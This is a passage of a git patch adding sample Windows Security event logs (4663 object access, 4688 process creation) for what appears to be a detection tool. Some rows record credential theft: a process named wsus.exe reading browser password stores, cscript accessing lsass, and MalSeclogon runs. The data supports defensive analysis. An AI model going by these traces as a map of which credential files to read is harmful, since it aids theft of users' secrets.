SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" -- 2.34.1 From ad128638e52ffad56e8cb5223d1ea46b1144c65e Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:43:47 +0800 Subject: [PATCH 06/13] ADD file via upload --- .../Sample_Process_Execution_Events.csv | 4130 +++++++++++++++++ 1 file changed, 4130 insertions(+) create mode 100644 source/samples/Sample_Process_Execution_Events.csv diff --git a/source/samples/Sample_Process_Execution_Events.csv b/source/samples/Sample_Process_Execution_Events.csv new file mode 100644 index 0000000..9b38ae6 --- /dev/null +++ b/source/samples/Sample_Process_Execution_Events.csv @@ -0,0 +1,4130 @@ +DateTime,timestamp,EventID,ProcessName,User,ParentProcessName,RawLog +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" 